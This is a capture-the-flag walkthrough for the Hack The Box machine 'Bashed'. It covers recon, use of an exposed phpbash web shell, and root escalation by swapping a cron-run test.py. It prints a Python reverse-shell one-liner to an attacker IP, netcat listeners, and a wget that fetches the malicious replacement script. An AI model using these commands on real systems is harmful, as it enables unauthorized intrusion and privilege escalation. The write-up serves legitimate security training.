Sounds like BASH script!!!
The name of a HTB box is usually a hint. Here it suggests that bash, or a script that runs bash commands, is the way into the system.
Let’s begin with recon.
Start with basic nmap scan.
nmap -sC -sV -O -oA nmap/basic 10.10.10.68
- -sC: Run the default nmap scripts
- -sV: Service/version detection
- -O: Enable OS detection
- -oA: Save the results in all three output formats (normal, grepable, XML)
We have the following results:
- Port 80 — Running Apache httpd 2.4.18 (Ubuntu)
Next, run the full nmap scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.68
- -p-: Scan all 65535 TCP ports
Again we get back the same result as above, only port 80 is open.
For this write-up, I got root while the UDP scan was still running, so I did not include the UDP scan result.
Port 80 Apache httpd 2.4.18 (Ubuntu)
Since only port 80 is open and it serves a web application, let's run gobuster in the background while we browse the site.
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f
- -u: Target URL
- -w: Custom wordlist
- -f: Append / to each request
Let’s click the red arrow.
This page says the developer of this site used a PHP script to run bash commands, and that the script is present on this server. Hint!!!
Click the GitHub link and we found these 2 scripts.
Analysing the two scripts shows that they use the PHP shell_exec function to run system commands on the target: they are a web shell. We will see whether this is useful in the exploitation phase.
Next, gobuster returns the following results:
After enumerating the directories above, /dev is the one we are looking for: it holds the phpbash.php and phpbash.min.php scripts we saw in the GitHub repo.
Great! Both scripts execute bash commands for us. We can use either one in the exploitation phase.
First, check the id and sudo privileges (sudo -l) of the user the web shell runs as.
Now we know this user can run any command as scriptmanager via sudo without a password (NOPASSWD). See here for background on NOPASSWD.
Next, check /etc/passwd file for any other user in the system using below command.
cat /etc/passwd | grep -v false | grep -v nologin
- -v false: Grep all except the line that contains string “false”
- -v nologin: Grep all except the line that contains string “nologin”
We are only looking for accounts that have an interactive login shell. Note that these greps match anywhere in the line, not just the shell field, so they would also hide an account whose name, comment or home directory happens to contain either string.
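The same enumeration done on the shell field itself, as an added example that is not part of the original write-up. The passwd content below is constructed for the example (it includes an account whose name contains "false" to show the difference); on a target you would pipe /etc/passwd into interactive_users instead. Function names are this example's own.

```shell
#!/bin/sh
# Constructed passwd sample: two accounts would be hidden by the
# "grep -v false | grep -v nologin" approach although they have a real shell.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
falsehood:x:1002:1002:name contains false:/home/falsehood:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
scriptmanager:x:1001:1001::/home/scriptmanager:/bin/bash
nologin-test:x:1003:1003::/home/nologin-test:/bin/sh'

# naive_users: the whole-line grep chain from the write-up, for comparison.
naive_users() {
  grep -v false | grep -v nologin
}

# interactive_users: reads passwd-formatted text on stdin and prints
# "user:uid:shell" for every account whose login shell (field 7) is not one
# of the usual non-login shells. Matching the shell field only means account
# names, comments and home directories can no longer hide a real login shell.
interactive_users() {
  awk -F: '$7 !~ /\/(false|nologin|sync|halt|shutdown)$/ { print $1 ":" $3 ":" $7 }'
}

# Usage: print the interactive accounts of the sample (on a box: < /etc/passwd).
printf '%s\n' "$SAMPLE_PASSWD" | interactive_users
```

Accounts with uid 0 show up in the output too, so a second root-equivalent account is visible at a glance.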
Let’s enumerate scriptmanager home directory for any interesting info.
The directory is empty. Let's find files owned by scriptmanager elsewhere on the filesystem with the find command.
find / -user scriptmanager | head
- /: Search the entire filesystem starting at the root directory
- -user: Match files owned by the given user
- head: Print only the first 10 lines of output
We got the following result:
Let's enumerate the /scripts directory.
Remember that to run a command as another user you use sudo -u <username> <command>.
Type below command in web shell:
sudo -u scriptmanager ls -l /scripts
- -u: Run command as another user
- ls -l: List files in the directory
Look at the timestamps of the files. test.py was last modified in December, whereas test.txt was written very recently. Check the content of test.py: all it does is write a test.txt file, and that test.txt is owned by root, so the script is being executed by root.
I also observed that the timestamp of test.txt changes every minute. This immediately told me there is a scheduled job run by root every minute.
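Confirming that observation rather than eyeballing ls -l twice, as an added example that is not part of the original write-up: mtime_changes waits a given number of seconds and reports whether the file was rewritten in the meantime (it compares against a freshly created reference file with find -newer, which avoids the GNU/BSD stat differences), and cron_sources lists the cron definitions the current user can read. /scripts/test.txt is the file from the box; the function names are this example's own.

```shell
#!/bin/sh
# mtime_changes FILE SECONDS: return 0 if FILE is modified during the next
# SECONDS seconds, 1 otherwise. A reference file created now marks the start
# of the window; "find -newer" then asks whether FILE's mtime is later.
mtime_changes() {
  file=$1; secs=$2
  ref=$(mktemp) || return 2
  sleep "$secs"
  if [ -n "$(find "$file" -newer "$ref" 2>/dev/null)" ]; then
    rm -f "$ref"; return 0
  fi
  rm -f "$ref"; return 1
}

# cron_sources: print every cron definition readable by the current user.
# /var/spool/cron/crontabs is normally root-only, so a job defined there
# (as on this box) may be invisible to an unprivileged user: the changing
# timestamp is then the only evidence.
cron_sources() {
  for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /var/spool/cron/crontabs/*; do
    if [ -r "$f" ]; then
      printf '== %s ==\n' "$f"
      cat "$f"
    fi
  done
  # systemd timers can start root jobs as well.
  if command -v systemctl >/dev/null 2>&1; then
    systemctl list-timers --all 2>/dev/null
  fi
  return 0
}

# Usage: sh watch.sh /scripts/test.txt 70   (a 1-minute job must fire within 70s)
if [ -n "${1:-}" ]; then
  if mtime_changes "$1" "${2:-70}"; then
    echo "$1 was rewritten during the window: something runs on a schedule"
    cron_sources
  else
    echo "$1 unchanged during the window"
  fi
fi
```

The window should be a little longer than the suspected interval; with a job every minute, 70 seconds is enough to see exactly one rewrite.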
Next, since test.py is a Python script, Python is installed on the box, so we can run a Python one-liner reverse shell as scriptmanager from the web shell to get a shell back on our Kali Linux.
Set up a netcat listener on port 4444 in your Kali Linux.
nc -nlvp 4444
Then run the command below in the web shell. This one-liner can be found on the pentestmonkey site.
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We now have a reverse shell as scriptmanager.
We know that test.py is run by root. So we create a test.py on our Kali Linux containing the same Python reverse shell one-liner as above and transfer it to the target (the Bashed box), replacing the original. The only thing to change is the port number; I used port 4445. Why do this? Because the script is run by root, and anything run by root can be leveraged for privilege escalation.
Save the file and start Python's simple HTTP server on port 8000 (the port the wget command below uses).
From the reverse shell, back up the existing test.py file.
Then download the new test.py into the /scripts directory with the command below:
cd /scripts/; wget http://10.10.14.21:8000/test.py
Now, set up a netcat listener in your Kali Linux on port 4445.
nc -nlvp 4445
Within a minute the scheduled job runs our script and we get a root shell.
Grab the root flag.
Grab the user flag.
Attack Strategy Map
Thank you for reading :-) Next box is Nibbles.